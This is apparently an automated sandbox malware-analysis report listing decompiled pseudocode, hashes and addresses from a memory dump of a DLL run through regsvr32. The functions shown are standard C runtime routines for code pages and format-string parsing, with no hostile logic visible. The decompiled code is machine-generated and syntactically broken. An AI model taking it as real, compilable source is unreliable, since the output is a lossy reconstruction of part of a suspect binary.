                                                                                                                                            0x7ffc65d05143
                                                                                                                                            0x7ffc65d05145
                                                                                                                                            0x7ffc65d0514a
                                                                                                                                            0x7ffc65d05170

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2452617236-0
                                                                                                                                            • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                                                                            • Instruction ID: b07554df610609b8eeb0677d7300a8c151aebda67634b1fd7ee69c802a79b92a
                                                                                                                                            • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                                                                            • Instruction Fuzzy Hash: 2D61EB32A0DA99C6DA60DF15E05036AB760FBC8B49F204935EACD83B9ADF3CD540CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                            			E00007FFC7FFC65CF9F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                                                                                                                            				long long _v16;
                                                                                                                                            				intOrPtr _v20;
                                                                                                                                            				intOrPtr _v24;
                                                                                                                                            				int _v28;
                                                                                                                                            				int _v32;
                                                                                                                                            				char _v64;
                                                                                                                                            				long long _v72;
                                                                                                                                            				intOrPtr _t29;
                                                                                                                                            				intOrPtr* _t41;
                                                                                                                                            
                                                                                                                                            				_t41 = __rax;
                                                                                                                                            				_a8 = __ecx;
                                                                                                                                            				_v16 = 0xfffffffe;
                                                                                                                                            				_v72 = 0;
                                                                                                                                            				0x65cf66b0();
                                                                                                                                            				 *0x65d1cd68 = 0;
                                                                                                                                            				if (_a8 != 0xfffffffe) goto 0x65cf9f81;
                                                                                                                                            				 *0x65d1cd68 = 1;
                                                                                                                                            				_v32 = GetOEMCP();
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v64);
                                                                                                                                            				goto 0x65cf9fe3;
                                                                                                                                            				if (_a8 != 0xfffffffd) goto 0x65cf9fae;
                                                                                                                                            				 *0x65d1cd68 = 1;
                                                                                                                                            				_v28 = GetACP();
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v64);
                                                                                                                                            				_t29 = _v28;
                                                                                                                                            				goto 0x65cf9fe3;
                                                                                                                                            				if (_a8 != 0xfffffffc) goto 0x65cf9fe3;
                                                                                                                                            				 *0x65d1cd68 = 1;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t29,  &_v64);
                                                                                                                                            				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v64);
                                                                                                                                            				goto 0x65cf9ff9;
                                                                                                                                            				_v20 = _a8;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v64);
                                                                                                                                            				return _v20;
                                                                                                                                            			}












                                                                                                                                            0x7ffc65cf9f20
                                                                                                                                            0x7ffc65cf9f20
                                                                                                                                            0x7ffc65cf9f28
                                                                                                                                            0x7ffc65cf9f31
                                                                                                                                            0x7ffc65cf9f44
                                                                                                                                            0x7ffc65cf9f4a
                                                                                                                                            0x7ffc65cf9f59
                                                                                                                                            0x7ffc65cf9f5b
                                                                                                                                            0x7ffc65cf9f6b
                                                                                                                                            0x7ffc65cf9f74
                                                                                                                                            0x7ffc65cf9f7f
                                                                                                                                            0x7ffc65cf9f86
                                                                                                                                            0x7ffc65cf9f88
                                                                                                                                            0x7ffc65cf9f98
                                                                                                                                            0x7ffc65cf9fa1
                                                                                                                                            0x7ffc65cf9fa6
                                                                                                                                            0x7ffc65cf9fac
                                                                                                                                            0x7ffc65cf9fb3
                                                                                                                                            0x7ffc65cf9fb5
                                                                                                                                            0x7ffc65cf9fc4
                                                                                                                                            0x7ffc65cf9fcf
                                                                                                                                            0x7ffc65cf9fd8
                                                                                                                                            0x7ffc65cf9fe1
                                                                                                                                            0x7ffc65cf9fe7
                                                                                                                                            0x7ffc65cf9ff0
                                                                                                                                            0x7ffc65cf9ffd

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1901436342-0
                                                                                                                                            • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                                                                            • Instruction ID: 1ec2087bce5a9c7c5ec4321442b0d3cec89c094dda05c9f20b04a01d5f08cdb2
                                                                                                                                            • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                                                                            • Instruction Fuzzy Hash: 2821F87390C655E6E7309F14E44126ABB70EB88B64F200735E29D426E9CF7DD585CF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                                                                                                            • API String ID: 2123368286-552404435
                                                                                                                                            • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                                                                            • Instruction ID: 5b6f6e82298333a86d2d82b08a43eacffa52aa1ce202eeed8fe6ac177ce9c404
                                                                                                                                            • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                                                                            • Instruction Fuzzy Hash: 7351182290DBDAC6E6748F14E54436AB3A0FB85B64F200A35D6AD43BE8DF7DD444CB11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                            			E00007FFC7FFC65D0BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                                                                            				void* _t184;
                                                                                                                                            				char* _t204;
                                                                                                                                            				char* _t205;
                                                                                                                                            
                                                                                                                                            				_a112 = 0;
                                                                                                                                            				_a108 = _a112;
                                                                                                                                            				_a88 = _a108;
                                                                                                                                            				_a92 = _a88;
                                                                                                                                            				_a80 = 0;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				_a76 = 0;
                                                                                                                                            				_a968 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a968 == 0x20) goto 0x65d0bd57;
                                                                                                                                            				if (_a968 == 0x23) goto 0x65d0bd64;
                                                                                                                                            				if (_a968 == 0x2b) goto 0x65d0bd4a;
                                                                                                                                            				if (_a968 == 0x2d) goto 0x65d0bd3d;
                                                                                                                                            				if (_a968 == 0x30) goto 0x65d0bd72;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000001;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000002;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				asm("bts eax, 0x7");
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000008;
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0bdbe;
                                                                                                                                            				_t204 =  &_a1112;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t204);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0bdbc;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0bdd5;
                                                                                                                                            				_a88 = _t184 + _t204 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0be16;
                                                                                                                                            				_t205 =  &_a1112;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t205);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0be14;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0be2d;
                                                                                                                                            				_a116 = _t184 + _t205 - 0x30;
                                                                                                                                            				_a972 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a972 == 0x49) goto 0x65d0beb7;
                                                                                                                                            				if (_a972 == 0x68) goto 0x65d0bfc0;
                                                                                                                                            				if (_a972 == 0x6c) goto 0x65d0be76;
                                                                                                                                            				if (_a972 == 0x77) goto 0x65d0bfcd;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				if ( *_a1096 != 0x6c) goto 0x65d0bea7;
                                                                                                                                            				_a1096 = _a1096 + 1;
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0beb2;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if ( *_a1096 != 0x36) goto 0x65d0bf09;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x65d0bf09;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 != 0x33) goto 0x65d0bf4c;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x65d0bf4c;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 == 0x64) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x69) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x6f) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x75) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x78) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 != 0x58) goto 0x65d0bfae;
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				_a704 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0BB66;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0bcbd
                                                                                                                                            0x7ffc65d0bcc9
                                                                                                                                            0x7ffc65d0bcd1
                                                                                                                                            0x7ffc65d0bcd9
                                                                                                                                            0x7ffc65d0bcdd
                                                                                                                                            0x7ffc65d0bce5
                                                                                                                                            0x7ffc65d0bced
                                                                                                                                            0x7ffc65d0bd02
                                                                                                                                            0x7ffc65d0bd11
                                                                                                                                            0x7ffc65d0bd1b
                                                                                                                                            0x7ffc65d0bd25
                                                                                                                                            0x7ffc65d0bd2f
                                                                                                                                            0x7ffc65d0bd39
                                                                                                                                            0x7ffc65d0bd3b
                                                                                                                                            0x7ffc65d0bd44
                                                                                                                                            0x7ffc65d0bd48
                                                                                                                                            0x7ffc65d0bd51
                                                                                                                                            0x7ffc65d0bd55
                                                                                                                                            0x7ffc65d0bd5e
                                                                                                                                            0x7ffc65d0bd62
                                                                                                                                            0x7ffc65d0bd68
                                                                                                                                            0x7ffc65d0bd70
                                                                                                                                            0x7ffc65d0bd79
                                                                                                                                            0x7ffc65d0bd8d
                                                                                                                                            0x7ffc65d0bd8f
                                                                                                                                            0x7ffc65d0bd9c
                                                                                                                                            0x7ffc65d0bda5
                                                                                                                                            0x7ffc65d0bdae
                                                                                                                                            0x7ffc65d0bdb8
                                                                                                                                            0x7ffc65d0bdbc
                                                                                                                                            0x7ffc65d0bdd1
                                                                                                                                            0x7ffc65d0bdda
                                                                                                                                            0x7ffc65d0bdf2
                                                                                                                                            0x7ffc65d0bdf4
                                                                                                                                            0x7ffc65d0be01
                                                                                                                                            0x7ffc65d0be0a
                                                                                                                                            0x7ffc65d0be0c
                                                                                                                                            0x7ffc65d0be14
                                                                                                                                            0x7ffc65d0be29
                                                                                                                                            0x7ffc65d0be3a
                                                                                                                                            0x7ffc65d0be49
                                                                                                                                            0x7ffc65d0be53
                                                                                                                                            0x7ffc65d0be61
                                                                                                                                            0x7ffc65d0be6b
                                                                                                                                            0x7ffc65d0be71
                                                                                                                                            0x7ffc65d0be84
                                                                                                                                            0x7ffc65d0be91
                                                                                                                                            0x7ffc65d0be9d
                                                                                                                                            0x7ffc65d0bea5
                                                                                                                                            0x7ffc65d0beae
                                                                                                                                            0x7ffc65d0beb2
                                                                                                                                            0x7ffc65d0bebb
                                                                                                                                            0x7ffc65d0bed1
                                                                                                                                            0x7ffc65d0bee2
                                                                                                                                            0x7ffc65d0bef0
                                                                                                                                            0x7ffc65d0befc
                                                                                                                                            0x7ffc65d0bf04
                                                                                                                                            0x7ffc65d0bf17
                                                                                                                                            0x7ffc65d0bf28
                                                                                                                                            0x7ffc65d0bf36
                                                                                                                                            0x7ffc65d0bf42
                                                                                                                                            0x7ffc65d0bf4a
                                                                                                                                            0x7ffc65d0bf5a
                                                                                                                                            0x7ffc65d0bf6a
                                                                                                                                            0x7ffc65d0bf7a
                                                                                                                                            0x7ffc65d0bf8a
                                                                                                                                            0x7ffc65d0bf9a
                                                                                                                                            0x7ffc65d0bfaa
                                                                                                                                            0x7ffc65d0bfac
                                                                                                                                            0x7ffc65d0bfae
                                                                                                                                            0x7ffc65d0bfb9
                                                                                                                                            0x7ffc65d0bfbe
                                                                                                                                            0x7ffc65d0bfc7
                                                                                                                                            0x7ffc65d0bfcb
                                                                                                                                            0x7ffc65d0bfd1
                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-192189897
                                                                                                                                            • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                                                                            • Instruction ID: e42a3aa1f4592279d289fe651d919c412b539aa92db8754cf6b2c4752cb4dfec
                                                                                                                                            • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                                                                            • Instruction Fuzzy Hash: 99413B7290C6EACAE374DF24E5543AEB7A4EB84714F600535D69C82AE9DB7CD140CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                            			E00007FFC7FFC65D0DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                                                                            				void* _t184;
                                                                                                                                            				char* _t204;
                                                                                                                                            				char* _t205;
                                                                                                                                            
                                                                                                                                            				_a112 = 0;
                                                                                                                                            				_a108 = _a112;
                                                                                                                                            				_a88 = _a108;
                                                                                                                                            				_a92 = _a88;
                                                                                                                                            				_a80 = 0;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				_a76 = 0;
                                                                                                                                            				_a1404 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1404 == 0x20) goto 0x65d0dd05;
                                                                                                                                            				if (_a1404 == 0x23) goto 0x65d0dd12;
                                                                                                                                            				if (_a1404 == 0x2b) goto 0x65d0dcf8;
                                                                                                                                            				if (_a1404 == 0x2d) goto 0x65d0dceb;
                                                                                                                                            				if (_a1404 == 0x30) goto 0x65d0dd20;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000001;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000002;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				asm("bts eax, 0x7");
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000008;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0dd6c;
                                                                                                                                            				_t204 =  &_a1560;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t204);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0dd6a;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0dd83;
                                                                                                                                            				_a88 = _t184 + _t204 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0ddc4;
                                                                                                                                            				_t205 =  &_a1560;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t205);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0ddc2;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0dddb;
                                                                                                                                            				_a116 = _t184 + _t205 - 0x30;
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0dc6b
                                                                                                                                            0x7ffc65d0dc77
                                                                                                                                            0x7ffc65d0dc7f
                                                                                                                                            0x7ffc65d0dc87
                                                                                                                                            0x7ffc65d0dc8b
                                                                                                                                            0x7ffc65d0dc93
                                                                                                                                            0x7ffc65d0dc9b
                                                                                                                                            0x7ffc65d0dcb0
                                                                                                                                            0x7ffc65d0dcbf
                                                                                                                                            0x7ffc65d0dcc9
                                                                                                                                            0x7ffc65d0dcd3
                                                                                                                                            0x7ffc65d0dcdd
                                                                                                                                            0x7ffc65d0dce7
                                                                                                                                            0x7ffc65d0dce9
                                                                                                                                            0x7ffc65d0dcf2
                                                                                                                                            0x7ffc65d0dcf6
                                                                                                                                            0x7ffc65d0dcff
                                                                                                                                            0x7ffc65d0dd03
                                                                                                                                            0x7ffc65d0dd0c
                                                                                                                                            0x7ffc65d0dd10
                                                                                                                                            0x7ffc65d0dd16
                                                                                                                                            0x7ffc65d0dd1e
                                                                                                                                            0x7ffc65d0dd27
                                                                                                                                            0x7ffc65d0dd3b
                                                                                                                                            0x7ffc65d0dd3d
                                                                                                                                            0x7ffc65d0dd4a
                                                                                                                                            0x7ffc65d0dd53
                                                                                                                                            0x7ffc65d0dd5c
                                                                                                                                            0x7ffc65d0dd66
                                                                                                                                            0x7ffc65d0dd6a
                                                                                                                                            0x7ffc65d0dd7f
                                                                                                                                            0x7ffc65d0dd88
                                                                                                                                            0x7ffc65d0dda0
                                                                                                                                            0x7ffc65d0dda2
                                                                                                                                            0x7ffc65d0ddaf
                                                                                                                                            0x7ffc65d0ddb8
                                                                                                                                            0x7ffc65d0ddba
                                                                                                                                            0x7ffc65d0ddc2
                                                                                                                                            0x7ffc65d0ddd7
                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-734865713
                                                                                                                                            • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                                                                            • Instruction ID: 06a5777dfed38660da1714a46b2ead50908781ca7978ffbcff7e043df7117368
                                                                                                                                            • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                                                                            • Instruction Fuzzy Hash: 5B412CB290C6A6CAE374DF14E5403AAB7A0FB84755F600536E68D87AD8DB7CD440CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                            			E00007FFC7FFC65D0DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                                                                                                                            				void* _t190;
                                                                                                                                            				char* _t210;
                                                                                                                                            				char* _t211;
                                                                                                                                            
                                                                                                                                            				_a76 = 1;
                                                                                                                                            				E00007FFC7FFC65D0EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                                                                                                                            				_a112 = 0;
                                                                                                                                            				_a108 = _a112;
                                                                                                                                            				_a88 = _a108;
                                                                                                                                            				_a92 = _a88;
